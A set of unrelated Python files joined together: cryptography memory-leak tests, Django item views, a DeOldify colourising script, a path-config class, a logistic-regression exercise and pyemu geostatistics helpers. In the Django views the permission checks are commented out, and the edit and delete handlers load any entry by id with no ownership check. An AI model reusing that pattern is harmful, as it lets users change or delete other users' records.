relative_name=x509.RelativeDistinguishedName([
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value=u"PyCA")
]),
only_contains_user_certs=False,
only_contains_ca_certs=True,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
)
builder = x509.CertificateRevocationListBuilder().issuer_name(
x509.Name([
x509.NameAttribute(
NameOID.COMMON_NAME, u"cryptography.io CA"
)
])
).last_update(
last_update
).next_update(
next_update
).add_extension(
idp, True
)
crl = builder.sign(key, hashes.SHA256(), backend)
crl.extensions.get_extension_for_class(
x509.IssuingDistributionPoint
)
"""
)
)
def test_create_certificate_with_extensions(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
import datetime
from cryptography import x509
from cryptography.hazmat.backends.openssl import backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.x509.oid import (
AuthorityInformationAccessOID, ExtendedKeyUsageOID, NameOID
)
private_key = ec.generate_private_key(ec.SECP256R1(), backend)
not_valid_before = datetime.datetime.now()
not_valid_after = not_valid_before + datetime.timedelta(days=365)
aia = x509.AuthorityInformationAccess([
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier(u"http://ocsp.domain.com")
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier(u"http://domain.com/ca.crt")
)
])
sans = [u'*.example.org', u'foobar.example.net']
san = x509.SubjectAlternativeName(list(map(x509.DNSName, sans)))
ski = x509.SubjectKeyIdentifier.from_public_key(
private_key.public_key()
)
eku = x509.ExtendedKeyUsage([
ExtendedKeyUsageOID.CLIENT_AUTH,
ExtendedKeyUsageOID.SERVER_AUTH,
ExtendedKeyUsageOID.CODE_SIGNING,
])
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
private_key.public_key()
).add_extension(
aia, critical=False
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(private_key, hashes.SHA256(), backend)
cert.extensions
"""
)
)
def test_write_pkcs12_key_and_certificates(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
import os
from cryptography import x509
from cryptography.hazmat.backends.openssl import backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.serialization import pkcs12
import cryptography_vectors
path = os.path.join('x509', 'custom', 'ca', 'ca.pem')
with cryptography_vectors.open_vector_file(path, "rb") as f:
cert = x509.load_pem_x509_certificate(
f.read(), backend
)
path2 = os.path.join('x509', 'custom', 'dsa_selfsigned_ca.pem')
with cryptography_vectors.open_vector_file(path2, "rb") as f:
cert2 = x509.load_pem_x509_certificate(
f.read(), backend
)
path3 = os.path.join('x509', 'letsencryptx3.pem')
with cryptography_vectors.open_vector_file(path3, "rb") as f:
cert3 = x509.load_pem_x509_certificate(
f.read(), backend
)
key_path = os.path.join("x509", "custom", "ca", "ca_key.pem")
with cryptography_vectors.open_vector_file(key_path, "rb") as f:
key = serialization.load_pem_private_key(
f.read(), None, backend
)
encryption = serialization.NoEncryption()
pkcs12.serialize_key_and_certificates(
b"name", key, cert, [cert2, cert3], encryption)
"""
)
)
|
import csv
from django.contrib.auth.decorators import permission_required
from django.shortcuts import render, redirect, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse
from .models import entry
from .forms import EntryForm
# @permission_required('admin.can_add_log_entry')
def add_item_view(request):
form = EntryForm(request.POST or None)
if form.is_valid():
obj = form.save(commit=False) # Don't save it yet
obj.user = request.user
obj.save()
form = EntryForm()
return redirect('/')
context = {
'form': form
}
return render(request, "addItem.html", context)
# def item_create_view(request):
# my_form = RawEntryForm(request.GET)
# if request.method == "POST":
# my_form = RawEntryForm(request.POST)
# if my_form.is_valid():
# #Now the data is good
# print(my_form.cleaned_data)
# entry.objects.create(**my_form.cleaned_data)
# context = {
# "form": my_form
# }
# return render(request, "addItem.html", context)
# @permission_required('admin.can_add_log_entry')
def delete_item_view(request, id):
obj = get_object_or_404(entry, id=id)
if request.method == "POST":
obj.delete()
return redirect('/')
context = {
"object": obj
}
return render(request, "deleteItem.html", context)
# @permission_required('admin.can_add_log_entry')
def delete_all_item_view(request):
if request.method == "POST":
entry.objects.filter(user=request.user).all().delete()
return redirect('/')
return render(request, "deleteAll.html")
# @permission_required('admin.can_add_log_entry')
def edit_item_view(request, id):
instance = get_object_or_404(entry, id=id)
form = EntryForm(request.POST or None, instance=instance)
if request.method == "POST":
if form.is_valid():
instance.save()
form = EntryForm()
return redirect('/')
context = {
"form": form,
"object": instance
}
return render(request, "editItem.html", context)
# @permission_required('admin.can_add_log_entry')
def entry_download(request):
items = entry.objects.filter(user=request.user).all()
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="items.csv"'
writer = csv.writer(response, delimiter=',')
writer.writerow(['Item', 'Picture_URL', 'Description', 'Price', 'Date', 'URL'])
for obj in items:
writer.writerow([obj.Item, obj.Picture_URL, obj.Description, obj.Price, obj.Date, obj.URL])
return response
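# A hypothetical urls.py wiring for the views above (route names and the app
# module path are illustrative, not taken from this project):
#
#     from django.urls import path
#     from . import views
#
#     urlpatterns = [
#         path('add/', views.add_item_view, name='add_item'),
#         path('delete/<int:id>/', views.delete_item_view, name='delete_item'),
#         path('delete-all/', views.delete_all_item_view, name='delete_all'),
#         path('edit/<int:id>/', views.edit_item_view, name='edit_item'),
#         path('download/', views.entry_download, name='entry_download'),
#     ]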
|
#NOTE: This must be the first call in order to work properly!
from deoldify import device
from deoldify.device_id import DeviceId
#choices: CPU, GPU0...GPU7
device.set(device=DeviceId.GPU0)
import argparse
parser = argparse.ArgumentParser(description='Inference code to colorize and fix old photos')
# use a store_true flag: argparse's type=bool treats any non-empty string (even 'False') as True
parser.add_argument('--artistic', action='store_true', help='use artistic mode')
parser.add_argument('--render_factor', type=int, help='render scale', default=35)
parser.add_argument('--input', type=str, help='input image name', default='test_images/image.png')
parser.add_argument('--output', type=str, help='output image name', default='result_images/output.png')
args = parser.parse_args()
from deoldify.visualize import *
plt.style.use('dark_background')
torch.backends.cudnn.benchmark=True
import warnings
warnings.filterwarnings("ignore", category=UserWarning, message=".*?Your .*? set is empty.*?")
colorizer = get_image_colorizer(artistic=args.artistic)
#NOTE: Max is 45 with 11GB video cards. 35 is a good default
# render_factor=args.render_factor
#NOTE: Make source_url None to just read from file at ./video/source/[file_name] directly without modification
# source_path = args.source_path
result = colorizer.plot_transformed_image(path=args.input, results_dir=None, render_factor=args.render_factor, compare=False)
# Output is written to result_images/image.png
# print(result)
# show_image_in_notebook(result_path)
# from PIL import Image
# Image.save(result, 'result_images/output.png')
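# Hypothetical follow-up (not verified against the DeOldify API): the --output
# argument above is parsed but never used. If plot_transformed_image() returns a
# PIL.Image, as the commented lines suggest, it could be saved explicitly:
#
#     if result is not None:
#         result.save(args.output)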
|
"""
This should move into a configparser structure..
"""
__version__ = "0.1"
class Configuration(object):
def __init__(self, program):
self.program = program
self.lastupload = ".uploaded"
# source tree locations
self.sourceDirIsEagle = "/Users/jplocher/Dropbox/eagle/"
self.sourceDirIsControlPoint = "/Users/jplocher/Dropbox/workspace/ArduinoPoint/"
self.sourceDirIsArduino = "/Users/jplocher/Dropbox/Arduino/"
self.sourceDirIsArduinoLibrary = "/Users/jplocher/Dropbox/Arduino/libraries"
self.sourceDirIsCAD = "/Users/jplocher/Dropbox/CAD/"
self.sourceDirIsScript = "/Users/jplocher/Dropbox/Scripts/"
self.sourceDirIsWikiDoc = "/Users/jplocher/Dropbox/WikiDocs/"
self.sourceDirIsExpressPCB = "/Users/jplocher/Dropbox/ExpressPCB/Published/"
self.ARDUINO_LIB_HOME = "/Applications/Arduino.app/Contents/Java/hardware/arduino/avr/libraries/"
self.ARDUINO_USER_LIB_HOME = "/Users/jplocher/Dropbox/Arduino/libraries/"
#self.JEKYLL_GITHUB_PUBLISH_DIR = None
#self.JEKYLL_PUBLISH_PAGES_DIR = "docs/pages/" # relative to parent dir of project..
#self.JEKYLL_PUBLISH_VERSIONS_DIR = "docs/_versions/"
self.JEKYLL_PUBLISH_PAGES_DIR = "pages/" # relative to JEKYLL_GITHUB_PUBLISH_DIR
self.JEKYLL_URL_PAGES_DIR = "/pages/" # absolute URL base for project pages
self.JEKYLL_GITHUB_PUBLISH_DIR_EAGLE = "/Users/jplocher/Dropbox/eagle/SPCoast.github.io/" # or None if local to repo
self.JEKYLL_LOCAL_PUBLISH_DIR_EAGLE = "_versions/"
self.JEKYLL_URL_PUBLISH_DIR_EAGLE = "/versions/" # ... for project versions
self.JEKYLL_GITHUB_PUBLISH_DIR_ARDUINO = "/Users/jplocher/Dropbox/eagle/SPCoast.github.io/" # or None if local to repo
self.JEKYLL_LOCAL_PUBLISH_DIR_ARDUINO = "_sketches/"
self.JEKYLL_URL_PUBLISH_DIR_ARDUINO = "/sketches/" # ... for project versions
|
import numpy as np
def logistic(X, y):
'''
LR Logistic Regression.
INPUT: X: training sample features, P-by-N matrix.
y: training sample labels, 1-by-N row vector.
OUTPUT: w: learned parameters, (P+1)-by-1 column vector.
'''
P, N = X.shape
w = np.zeros((P + 1, 1))
# YOUR CODE HERE
# begin answer
learning_rate = 0.1
# build the augmented data matrix: prepend a bias row of ones to X
D = np.vstack((np.ones((1, N)), X))
for _ in range(1000):
# compute exp(w^T x) for each sample (denominator term of the sigmoid)
exp = np.exp(np.matmul(w.T, D))
delta = np.zeros((P+1, N))
for i in range(N):
delta[:, i] = D[:, i] * exp[0, i] / (1 + exp[0, i]) - D[:, i] * y[0, i]
# sum the per-sample gradient contributions
delta = np.sum(delta, axis=1)
if learning_rate * np.linalg.norm(delta) < 0.001:
break
w -= learning_rate * delta.reshape((-1, 1))
# end answer
return w
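# A minimal, hypothetical smoke test (not part of the original module): it draws a
# linearly separable toy set, fits w with the function above, and reports training
# accuracy. Shapes follow the docstring: X is P-by-N, y is 1-by-N with labels in {0, 1}.
if __name__ == '__main__':
    np.random.seed(0)
    N = 200
    X = np.random.randn(2, N)                      # P = 2 features
    y = (X[0, :] + X[1, :] > 0).astype(float).reshape(1, N)
    w = logistic(X, y)
    D = np.vstack((np.ones((1, N)), X))            # same augmentation as in logistic()
    prob = 1.0 / (1.0 + np.exp(-np.matmul(w.T, D)))
    acc = np.mean((prob > 0.5).astype(float) == y)
    print('training accuracy: {:.2f}'.format(acc))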
|
"""High-level functions to help perform complex tasks
"""
from __future__ import print_function, division
import os
import multiprocessing as mp
import warnings
from datetime import datetime
import platform
import struct
import shutil
import copy
import time
from ast import literal_eval
import traceback
import sys
import numpy as np
import pandas as pd
pd.options.display.max_colwidth = 100
from ..pyemu_warnings import PyemuWarning
try:
import flopy
except:
pass
import pyemu
from pyemu.utils.os_utils import run, start_workers
def geostatistical_draws(pst, struct_dict,num_reals=100,sigma_range=4,verbose=True,
scale_offset=True):
"""construct a parameter ensemble from a prior covariance matrix
implied by geostatistical structure(s) and parameter bounds.
Args:
pst (`pyemu.Pst`): a control file (or the name of control file). The
parameter bounds in `pst` are used to define the variance of each
parameter group.
struct_dict (`dict`): a dict of GeoStruct (or structure file), and list of
pilot point template files pairs. If the values in the dict are
`pd.DataFrames`, then they must have an 'x','y', and 'parnme' column.
If the filename ends in '.csv', then a pd.DataFrame is loaded,
otherwise a pilot points file is loaded.
num_reals (`int`, optional): number of realizations to draw. Default is 100
sigma_range (`float`): a float representing the number of standard deviations
implied by parameter bounds. Default is 4.0, which implies 95% confidence parameter bounds.
verbose (`bool`, optional): flag to control output to stdout. Default is True.
scale_offset (`bool`,optional): flag to apply scale and offset to parameter bounds
when calculating variances - this is passed through to `pyemu.Cov.from_parameter_data()`.
Default is True.
Returns:
`pyemu.ParameterEnsemble`: the realized parameter ensemble.
Note:
parameters are realized by parameter group. The variance of each
parameter group is used to scale the resulting geostatistical
covariance matrix. Therefore, the sill of the geostatistical structures
in `struct_dict` should be 1.0
Example::
pst = pyemu.Pst("my.pst")
sd = {"struct.dat":["hkpp.dat.tpl","vka.dat.tpl"]}
pe = pyemu.helpers.geostatistical_draws(pst,struct_dict=sd)
pe.to_csv("my_pe.csv")
"""
if isinstance(pst, str):
pst = pyemu.Pst(pst)
assert isinstance(pst, pyemu.Pst), "pst arg must be a Pst instance, not {0}". \
format(type(pst))
if verbose: print("building diagonal cov")
full_cov = pyemu.Cov.from_parameter_data(pst, sigma_range=sigma_range,
scale_offset=scale_offset)
full_cov_dict = {n: float(v) for n, v in zip(full_cov.col_names, full_cov.x)}
# par_org = pst.parameter_data.copy # not sure about the need or function of this line? (BH)
par = pst.parameter_data
par_ens = []
pars_in_cov = set()
keys = list(struct_dict.keys())
keys.sort()
for gs in keys:
items = struct_dict[gs]
if verbose: print("processing ", gs)
if isinstance(gs, str):
gss = pyemu.geostats.read_struct_file(gs)
if isinstance(gss, list):
warnings.warn("using first geostat structure in file {0}". \
format(gs), PyemuWarning)
gs = gss[0]
else:
gs = gss
if gs.sill != 1.0:
warnings.warn("GeoStruct {0} sill != 1.0 - this is bad!".format(gs.name))
if not isinstance(items, list):
items = [items]
# items.sort()
for iitem,item in enumerate(items):
if isinstance(item, str):
assert os.path.exists(item), "file {0} not found". \
format(item)
if item.lower().endswith(".tpl"):
df = pyemu.pp_utils.pp_tpl_to_dataframe(item)
elif item.lower().endswith(".csv"):
df = pd.read_csv(item)
else:
df = item
if "pargp" in df.columns:
if verbose: print("working on pargroups {0}".format(df.pargp.unique().tolist()))
for req in ['x', 'y', 'parnme']:
if req not in df.columns:
raise Exception("{0} is not in the columns".format(req))
missing = df.loc[df.parnme.apply(
lambda x: x not in par.parnme), "parnme"]
if len(missing) > 0:
warnings.warn("the following parameters are not " + \
"in the control file: {0}". \
format(','.join(missing)), PyemuWarning)
df = df.loc[df.parnme.apply(lambda x: x not in missing)]
if df.shape[0] == 0:
warnings.warn("geostatistical_draws(): empty parameter df at position {0} items for geostruct {1}, skipping...".\
format(iitem,gs))
continue
if "zone" not in df.columns:
df.loc[:, "zone"] = 1
zones = df.zone.unique()
aset = set(pst.adj_par_names)
for zone in zones:
df_zone = df.loc[df.zone == zone, :].copy()
df_zone = df_zone.loc[df_zone.parnme.apply(lambda x: x in aset), :]
if df_zone.shape[0] == 0:
warnings.warn("all parameters in zone {0} tied and/or fixed, skipping...".format(zone),
PyemuWarning)
continue
# df_zone.sort_values(by="parnme",inplace=True)
df_zone.sort_index(inplace=True)
if verbose: print("build cov matrix")
cov = gs.covariance_matrix(df_zone.x, df_zone.y, df_zone.parnme)
if verbose: print("done")
if verbose: print("getting diag var cov", df_zone.shape[0])
# tpl_var = np.diag(full_cov.get(list(df_zone.parnme)).x).max()
tpl_var = max([full_cov_dict[pn] for pn in df_zone.parnme])
if verbose: print("scaling full cov by diag var cov")
# cov.x *= tpl_var
for i in range(cov.shape[0]):
cov.x[i, :] *= tpl_var
# no fixed values here
pe = pyemu.ParameterEnsemble.from_gaussian_draw(pst=pst, cov=cov, num_reals=num_reals,
by_groups=False, fill=False)
# df = pe.iloc[:,:]
par_ens.append(pe._df)
pars_in_cov.update(set(pe.columns))
if verbose: print("adding remaining parameters to diagonal")
fset = set(full_cov.row_names)
diff = list(fset.difference(pars_in_cov))
if (len(diff) > 0):
name_dict = {name: i for i, name in enumerate(full_cov.row_names)}
vec = np.atleast_2d(np.array([full_cov.x[name_dict[d]] for d in diff]))
cov = pyemu.Cov(x=vec, names=diff, isdiagonal=True)
# cov = full_cov.get(diff,diff)
# here we fill in the fixed values
pe = pyemu.ParameterEnsemble.from_gaussian_draw(pst, cov, num_reals=num_reals,
fill=False)
par_ens.append(pe._df)
par_ens = pd.concat(par_ens, axis=1)
par_ens = pyemu.ParameterEnsemble(pst=pst, df=par_ens)
return par_ens
def geostatistical_prior_builder(pst, struct_dict, sigma_range=4,
verbose=False, scale_offset=False):
"""construct a full prior covariance matrix using geostastical structures
and parameter bounds information.
Args:
pst (`pyemu.Pst`): a control file instance (or the name of control file)
struct_dict (`dict`): a dict of GeoStruct (or structure file), and list of
pilot point template files pairs. If the values in the dict are
`pd.DataFrames`, then they must have an 'x','y', and 'parnme' column.
If the filename ends in '.csv', then a pd.DataFrame is loaded,
otherwise a pilot points file is loaded.
sigma_range (`float`): a float representing the number of standard deviations
implied by parameter bounds. Default is 4.0, which implies 95% confidence parameter bounds.
verbose (`bool`, optional): flag to control output to stdout. Default is False.
scale_offset (`bool`): a flag to apply scale and offset to parameter upper and lower bounds
before applying log transform. Passed to pyemu.Cov.from_parameter_data(). Default
is False
Returns:
`pyemu.Cov`: a covariance matrix that includes all adjustable parameters in the control
file.
Note:
The covariance of parameters associated with geostatistical structures is defined
as a mixture of GeoStruct and bounds. That is, the GeoStruct is used to construct a
pyemu.Cov, then the entire pyemu.Cov is scaled by the uncertainty implied by the bounds and
sigma_range. Most users will want the sill of the geostruct to sum to 1.0 so that the resulting
covariance matrices have variance proportional to the parameter bounds. Sounds complicated...
Example::
pst = pyemu.Pst("my.pst")
sd = {"struct.dat":["hkpp.dat.tpl","vka.dat.tpl"]}
cov = pyemu.helpers.geostatistical_prior_builder(pst,struct_dict=sd)
cov.to_binary("prior.jcb")
"""
if isinstance(pst, str):
pst = pyemu.Pst(pst)
assert isinstance(pst, pyemu.Pst), "pst arg must be a Pst instance, not {0}". \
format(type(pst))
if verbose: print("building diagonal cov")
full_cov = pyemu.Cov.from_parameter_data(pst, sigma_range=sigma_range,
scale_offset=scale_offset)
full_cov_dict = {n: float(v) for n, v in zip(full_cov.col_names, full_cov.x)}
# full_cov = None
par = pst.parameter_data
for gs, items in struct_dict.items():
if verbose: print("processing ", gs)
if isinstance(gs, str):
gss = pyemu.geostats.read_struct_file(gs)
if isinstance(gss, list):
warnings.warn("using first geostat structure in file {0}". \
format(gs), PyemuWarning)
gs = gss[0]
else:
gs = gss
if gs.sill != 1.0:
warnings.warn("geostatistical_prior_builder() warning: geostruct sill != 1.0, user beware!")
if not isinstance(items, list):
items = [items]
for item in items:
if isinstance(item, str):
assert os.path.exists(item), "file {0} not found". \
format(item)
if item.lower().endswith(".tpl"):
df = pyemu.pp_utils.pp_tpl_to_dataframe(item)
elif item.lower().endswith(".csv"):
df = pd.read_csv(item)
else:
df = item
for req in ['x', 'y', 'parnme']:
if req not in df.columns:
raise Exception("{0} is not in the columns".format(req))
missing = df.loc[df.parnme.apply(
lambda x: x not in par.parnme), "parnme"]
if len(missing) > 0:
warnings.warn("the following parameters are not " + \
"in the control file: {0}". \
format(','.join(missing)), PyemuWarning)
df = df.loc[df.parnme.apply(lambda x: x not in missing)]
if "zone" not in df.columns:
df.loc[:, "zone"] = 1
zones = df.zone.unique()
aset = set(pst.adj_par_names)
for zone in zones:
df_zone = df.loc[df.zone == zone, :].copy()
df_zone = df_zone.loc[df_zone.parnme.apply(lambda x: x in aset), :]
if df_zone.shape[0] == 0:
warnings.warn("all parameters in zone {0} tied and/or fixed, skipping...".format(zone),
PyemuWarning)
continue
# df_zone.sort_values(by="parnme",inplace=True)
df_zone.sort_index(inplace=True)
if verbose: print("build cov matrix")
cov = gs.covariance_matrix(df_zone.x, df_zone.y, df_zone.parnme)
if verbose: print("done")
# find the variance in the diagonal cov
if verbose: print("getting diag var cov", df_zone.shape[0])
# tpl_var = np.diag(full_cov.get(list(df_zone.parnme)).x).max()
tpl_var = max([full_cov_dict[pn] for pn in df_zone.parnme])
# if np.std(tpl_var) > 1.0e-6:
# warnings.warn("pars have different ranges" +\
# " , using max range as variance for all pars")
# tpl_var = tpl_var.max()
if verbose: print("scaling full cov by diag var cov")
cov *= tpl_var
if verbose: print("test for inversion")
try:
ci = cov.inv
except:
df_zone.to_csv("prior_builder_crash.csv")
raise Exception("error inverting cov {0}".
format(cov.row_names[:3]))
if verbose: print('replace in full cov')
full_cov.replace(cov)
# d = np.diag(full_cov.x)
# idx = np.argwhere(d==0.0)
# for i in idx:
# print(full_cov.names[i])
return full_cov
def _rmse(v1, v2):
"""return root mean squared error between v1 and v2
Args:
v1 (iterable): one vector
v2 (iterable): another vector
Returns:
scalar: root mean squared error of v1,v2
"""
return np.sqrt(np.mean(np.square(v1-v2)))
def calc_observation_ensemble_quantiles(ens, pst, quantiles, subset_obsnames=None, subset_obsgroups=None):
"""Given an observation ensemble, and requested quantiles, this function calculates the requested
quantile point-by-point in the ensemble. This resulting set of values does not, however, correspond
to a single realization in the ensemble. So, this function finds the minimum weighted squared
distance to the quantile and labels it in the ensemble. Also indicates which realizations
correspond to the selected quantiles.
Args:
ens (pandas DataFrame): DataFrame read from an observation
pst (pyemu.Pst object): needed to obtain observation weights
quantiles (iterable): quantiles ranging from 0-1.0 for which results requested
subset_obsnames (iterable): list of observation names to include in calculations
subset_obsgroups (iterable): list of observation groups to include in calculations
Returns:
ens (pandas DataFrame): same ens object that was input but with quantile realizations
appended as new rows labelled 'q<quantile>' (e.g. 'q0.5'), one for each requested quantile
quantile_idx (dictionary): dictionary with keys being the quantile labels and values being
the index of the realization closest to each quantile
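Example (a hypothetical sketch; file names are illustrative)::
    ens = pd.read_csv("obs_ensemble.csv", index_col=0)
    pst = pyemu.Pst("my.pst")
    ens, qidx = pyemu.helpers.calc_observation_ensemble_quantiles(
        ens, pst, [0.05, 0.5, 0.95])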
"""
#TODO: handle zero weights due to PDC
quantile_idx = {}
# make sure quantiles and subset names and groups are lists
if not isinstance(quantiles, list):
quantiles = list(quantiles)
if not isinstance(subset_obsnames, list) and subset_obsnames is not None:
subset_obsnames = list(subset_obsnames)
if not isinstance(subset_obsgroups, list) and subset_obsgroups is not None:
subset_obsgroups = list(subset_obsgroups)
if 'real_name' in ens.columns:
ens = ens.set_index('real_name')
# if 'base' real was lost, then the index is of type int. needs to be string later so set here
ens.index = [str(i) for i in ens.index]
if not isinstance(pst, pyemu.Pst):
raise Exception('pst object must be of type pyemu.Pst')
# get the observation data
obs = pst.observation_data.copy()
# confirm that the indices and weights line up
if False in np.unique(ens.columns == obs.index):
raise Exception('ens and pst observation names do not align')
# deal with any subsetting of observations that isn't handled through weights
trimnames = obs.index.values
if subset_obsgroups is not None and subset_obsnames is not None:
raise Exception('can only specify information in one of subset_obsnames of subset_obsgroups. not both')
if subset_obsnames is not None:
trimnames = subset_obsnames
if len(set(trimnames) - set(obs.index.values)) != 0:
raise Exception('the following names in subset_obsnames are not in the ensemble:\n' +
''.join('{}\n'.format(i) for i in (set(trimnames) - set(obs.index.values))))
if subset_obsgroups is not None:
if len((set(subset_obsgroups) - set(pst.obs_groups))) != 0:
raise Exception('the following groups in subset_obsgroups are not in pst:\n' +
''.join('{}\n'.format(i) for i in (set(subset_obsgroups) - set(pst.obs_groups))))
trimnames = obs.loc[obs.obgnme.isin(subset_obsgroups)].obsnme.tolist()
if len((set(trimnames) - set(obs.index.values))) != 0:
raise Exception('the following names in subset_obsnames are not in the ensemble:\n' +
''.join('{}\n'.format(i) for i in (set(trimnames) - set(obs.index.values))))
# trim the data to subsets (or complete )
ens_eval = ens[trimnames].copy()
weights = obs.loc[trimnames].weight.values
for cq in quantiles:
# calculate the point-wise quantile values
qfit = np.quantile(ens_eval, cq, axis=0)
# calculate the weighted distance between all reals and the desired quantile
qreal = np.argmin(np.linalg.norm([(i - qfit)*weights for i in ens_eval.values], axis=1))
quantile_idx['q{}'.format(cq)] = qreal
ens = ens.append(ens.iloc[qreal])
idx = ens.index.values
idx[-1] = 'q{}'.format(cq)
ens.set_index(idx, inplace=True)
return ens, quantile_idx
def calc_rmse_ensemble(ens, pst, bygroups=True, subset_realizations=None):
"""Calculates RMSE (without weights) to quantify fit to observations for ensemble members
Args:
ens (pandas DataFrame): DataFrame read from an observation
pst (pyemu.Pst object): needed to obtain observation weights
bygroups (Bool): Flag to summarize by groups or not. Defaults to True.
subset_realizations (iterable, optional): Subset of realizations for which
to report RMSE. Defaults to None which returns all realizations.
Returns:
rmse (pandas DataFrame object): rows are realizations. Columns are groups. Content is RMSE
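Example (a hypothetical sketch; file names are illustrative)::
    ens = pd.read_csv("obs_ensemble.csv", index_col=0)
    pst = pyemu.Pst("my.pst")
    rmse = pyemu.helpers.calc_rmse_ensemble(ens, pst, bygroups=True)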
"""
#TODO: handle zero weights due to PDC
# make sure subset_realizations is a list
if not isinstance(subset_realizations, list) and subset_realizations is not None:
subset_realizations = list(subset_realizations)
if 'real_name' in ens.columns:
ens = ens.set_index('real_name')
if not isinstance(pst, pyemu.Pst):
raise Exception('pst object must be of type pyemu.Pst')
# get the observation data
obs = pst.observation_data.copy()
# confirm that the indices and observations line up
if False in np.unique(ens.columns == obs.index):
raise Exception('ens and pst observation names do not align')
rmse = pd.DataFrame(index=ens.index)
if subset_realizations is not None:
rmse = rmse.loc[subset_realizations]
# calculate the rmse total first
rmse['total'] = [_rmse(ens.loc[i], obs.obsval) for i in rmse.index]
# if bygroups, do the groups as columns
if bygroups is True:
for cg in obs.obgnme.unique():
cnames = obs.loc[obs.obgnme == cg].obsnme
rmse[cg] = [_rmse(ens.loc[i][cnames], obs.loc[cnames].obsval) for i in rmse.index]
return rmse
def _condition_on_par_knowledge(cov, par_knowledge_dict):
""" experimental function to include conditional prior information
for one or more parameters in a full covariance matrix
"""
missing = []
for parnme in par_knowledge_dict.keys():
if parnme not in cov.row_names:
missing.append(parnme)
if len(missing):
raise Exception("par knowledge dict parameters not found: {0}". \
format(','.join(missing)))
# build the selection matrix and sigma epsilon
# sel = pyemu.Cov(x=np.identity(cov.shape[0]),names=cov.row_names)
sel = cov.zero2d
sel = cov.to_pearson()
new_cov_diag = pyemu.Cov(x=np.diag(cov.as_2d.diagonal()), names=cov.row_names)
# new_cov_diag = cov.zero2d
for parnme, var in par_knowledge_dict.items():
idx = cov.row_names.index(parnme)
# sel.x[idx,:] = 1.0
# sel.x[idx,idx] = var
new_cov_diag.x[idx, idx] = var # cov.x[idx,idx]
new_cov_diag = sel * new_cov_diag * sel.T
for _ in range(2):
for parnme, var in par_knowledge_dict.items():
idx = cov.row_names.index(parnme)
# sel.x[idx,:] = 1.0
# sel.x[idx,idx] = var
new_cov_diag.x[idx, idx] = var # cov.x[idx,idx]
new_cov_diag = sel * new_cov_diag * sel.T
print(new_cov_diag)
return new_cov_diag
def kl_setup(num_eig, sr, struct, prefixes,
factors_file="kl_factors.dat",
islog=True, basis_file=None,
tpl_dir="."):
"""setup a karhuenen-Loeve based parameterization for a given
geostatistical structure.
Args:
num_eig (`int`): the number of basis vectors to retain in the
reduced basis
sr (`flopy.reference.SpatialReference`): a spatial reference instance
struct (`str`): a PEST-style structure file. Can also be a
`pyemu.geostats.Geostruct` instance.
prefixes ([`str`]): a list of parameter prefixes to generate KL
parameterization for.
factors_file (`str`, optional): name of the PEST-style interpolation
factors file to write (can be processed with FAC2REAL).
Default is "kl_factors.dat".
islog (`bool`, optional): flag to indicate if the parameters are log transformed.
Default is True
basis_file (`str`, optional): the name of the PEST-style binary (e.g. jco)
file to write the reduced basis vectors to. Default is None (not saved).
tpl_dir (`str`, optional): the directory to write the resulting
template files to. Default is "." (current directory).
Returns:
`pandas.DataFrame`: a dataframe of parameter information.
Note:
This is the companion function to `helpers.apply_kl()`
Example::
m = flopy.modflow.Modflow.load("mymodel.nam")
prefixes = ["hk","vka","ss"]
df = pyemu.helpers.kl_setup(10,m.sr,"struct.dat",prefixes)
"""
try:
import flopy
except Exception as e:
raise Exception("error import flopy: {0}".format(str(e)))
assert isinstance(sr, flopy.utils.SpatialReference)
# for name,array in array_dict.items():
# assert isinstance(array,np.ndarray)
# assert array.shape[0] == sr.nrow
# assert array.shape[1] == sr.ncol
# assert len(name) + len(str(num_eig)) <= 12,"name too long:{0}".\
# format(name)
if isinstance(struct, str):
assert os.path.exists(struct)
gs = pyemu.utils.read_struct_file(struct)
else:
gs = struct
names = []
for i in range(sr.nrow):
names.extend(["i{0:04d}j{1:04d}".format(i, j) for j in range(sr.ncol)])
cov = gs.covariance_matrix(sr.xcentergrid.flatten(),
sr.ycentergrid.flatten(),
names=names)
eig_names = ["eig_{0:04d}".format(i) for i in range(cov.shape[0])]
trunc_basis = cov.u
trunc_basis.col_names = eig_names
# trunc_basis.col_names = [""]
if basis_file is not None:
trunc_basis.to_binary(basis_file)
trunc_basis = trunc_basis[:, :num_eig]
eig_names = eig_names[:num_eig]
pp_df = pd.DataFrame({"name": eig_names}, index=eig_names)
pp_df.loc[:, "x"] = -1.0 * sr.ncol
pp_df.loc[:, "y"] = -1.0 * sr.nrow
pp_df.loc[:, "zone"] = -999
pp_df.loc[:, "parval1"] = 1.0
pyemu.pp_utils.write_pp_file(os.path.join("temp.dat"), pp_df)
_eigen_basis_to_factor_file(sr.nrow, sr.ncol, trunc_basis,
factors_file=factors_file, islog=islog)
dfs = []
for prefix in prefixes:
tpl_file = os.path.join(tpl_dir, "{0}.dat_kl.tpl".format(prefix))
df = pyemu.pp_utils.pilot_points_to_tpl("temp.dat", tpl_file, prefix)
shutil.copy2("temp.dat", tpl_file.replace(".tpl", ""))
df.loc[:, "tpl_file"] = tpl_file
df.loc[:, "in_file"] = tpl_file.replace(".tpl", "")
df.loc[:, "prefix"] = prefix
df.loc[:, "pargp"] = "kl_{0}".format(prefix)
dfs.append(df)
# arr = pyemu.geostats.fac2real(df,factors_file=factors_file,out_file=None)
df = pd.concat(dfs)
df.loc[:, "parubnd"] = 10.0
df.loc[:, "parlbnd"] = 0.1
return df
# back_array_dict = {}
# f = open(tpl_file,'w')
# f.write("ptf ~\n")
# f.write("name,org_val,new_val\n")
# for name,array in array_dict.items():
# mname = name+"mean"
# f.write("{0},{1:20.8E},~ {2} ~\n".format(mname,0.0,mname))
